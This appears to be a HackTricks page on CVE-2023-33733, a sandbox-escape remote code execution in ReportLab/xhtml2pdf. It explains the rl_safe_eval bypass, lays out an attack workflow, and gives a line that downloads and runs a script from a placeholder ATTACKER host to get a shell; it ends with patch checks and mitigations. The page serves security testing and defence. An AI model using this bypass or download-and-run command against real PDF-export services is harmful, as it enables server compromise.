ReportLab/xhtml2pdf [[[…]]] expression-evaluation RCE (CVE-2023-33733)

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

This page documents a practical sandbox escape and RCE primitive in ReportLab’s rl_safe_eval used by xhtml2pdf and other PDF-generation pipelines when rendering user-controlled HTML into PDFs.

CVE-2023-33733 affects ReportLab versions up to and including 3.6.12. In certain attribute contexts (for example color), values wrapped in triple brackets [[[ … ]]] are evaluated server-side by rl_safe_eval. By crafting a payload that pivots from a whitelisted builtin (pow) to its Python function globals, an attacker can reach the os module and execute commands.

Key points

  • Trigger: inject [[[ … ]]] into evaluated attributes such as within markup parsed by ReportLab/xhtml2pdf.
  • Sandbox: rl_safe_eval replaces dangerous builtins but evaluated functions still expose globals.
  • Bypass: craft a transient class Word to bypass rl_safe_eval name checks and access the string “globals” while avoiding blocked dunder filtering.
  • RCE: getattr(pow, Word('__globals__'))['os'].system('<cmd>')
  • Stability: Return a valid value for the attribute after execution (for color, use and ‘red’).

When to test

  • Applications that expose HTML-to-PDF export (profiles, invoices, reports) and show xhtml2pdf/ReportLab in PDF metadata or HTTP response comments.
  • exiftool profile.pdf | egrep ‘Producer|Title|Creator’ → “xhtml2pdf” producer
  • HTTP response for PDF often starts with a ReportLab generator comment

How the sandbox bypass works

  • rl_safe_eval removes or replaces many builtins (getattr, type, pow, …) and applies name filtering to deny attributes starting with __ or in a denylist.
  • However, safe functions live in a globals dictionary accessible as func.globals.
  • Use type(type(1)) to recover the real builtin type function (bypassing ReportLab’s wrapper), then define a Word class derived from str with mutated comparison behavior so that:
  • .startswith(‘’) → always False (bypass name startswith(‘’) check)
  • .eq returns False only at first comparison (bypass denylist membership checks) and True afterwards (so Python getattr works)
  • .hash equals hash(str(self))
  • With this, getattr(pow, Word(‘globals’)) returns the globals dict of the wrapped pow function, which includes an imported os module. Then: ['os'].system('<cmd>').

Minimal exploitation pattern (attribute example) Place payload inside an evaluated attribute and ensure it returns a valid attribute value via boolean and ‘red’.

exploit

  • The list-comprehension form allows a single expression acceptable to rl_safe_eval.
  • The trailing and ‘red’ returns a valid CSS color so the rendering doesn’t break.
  • Replace the command as needed; use ping to validate execution with tcpdump.

Operational workflow

  1. Identify PDF generator
  • PDF Producer shows xhtml2pdf; HTTP response contains ReportLab comment.
  1. Find an input reflected into the PDF (e.g., profile bio/description) and trigger an export.
  2. Verify execution with low-noise ICMP
  • Run: sudo tcpdump -ni <iface> icmp
  • Payload: … system('ping <your_ip>')
  • Windows often sends exactly four echo requests by default.
  1. Establish a shell
  • For Windows, a reliable two-stage approach avoids quoting/encoding issues:
  • Stage 1 (download):

exploit

  • Stage 2 (execute):

exploit

  • For Linux targets, similar two-stage with curl/wget is possible:
  • system(‘curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s’)

Notes and tips

  • Attribute contexts: color is a known evaluated attribute; other attributes in ReportLab markup may also evaluate expressions. If one location is sanitized, try others rendered into the PDF flow (different fields, table styles, etc.).
  • Quoting: Keep commands compact. Two-stage downloads drastically reduce quoting and escaping headaches.
  • Reliability: If exports are cached or queued, slightly vary the payload (e.g., random path or query) to avoid hitting caches.

Patch status (2024–2025) and identifying backports

  • 3.6.13 (27 Apr 2023) rewrote colors.toColor to an AST-walk parser; newer 4.x releases keep this path. Forcing rl_settings.toColorCanUse to rl_safe_eval or rl_extended_literal_eval re-enables the vulnerable evaluator even on current versions.
  • Several distributions ship backported fixes while keeping version numbers such as 3.6.12-1+deb12u1; do not rely on the semantic version alone. Grep colors.py for ast.parse or inspect toColor at runtime to confirm the safe parser is in use (see quick check below).
  • Quick local check to see whether the AST-based fix is present:
python - <<'PY'
import inspect
from reportlab.lib import colors
src = inspect.getsource(colors.toColor)
print('AST-based toColor' if 'ast.parse' in src else 'rl_safe_eval still reachable')
PY

緩和策と検出

  • ReportLab を 3.6.13 以上にアップグレードしてください(CVE-2023-33733 が修正されています)。ディストリビューションのパッケージにおけるセキュリティ勧告も追跡してください。
  • ユーザー制御の HTML/マークアップを、厳格なサニタイズなしに xhtml2pdf/ReportLab に直接渡さないでください。入力が信頼できない場合は [[[…]]] の評価構文やベンダー固有のタグを除去/拒否してください。
  • 信頼できない入力に対しては、rl_safe_eval の使用を完全に無効化するか、ラップして制限することを検討してください。
  • PDF 生成中に疑わしいアウトバウンド接続を監視してください(例:ドキュメントをエクスポートする際のアプリサーバーからの ICMP/HTTP 等)。

参考資料

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする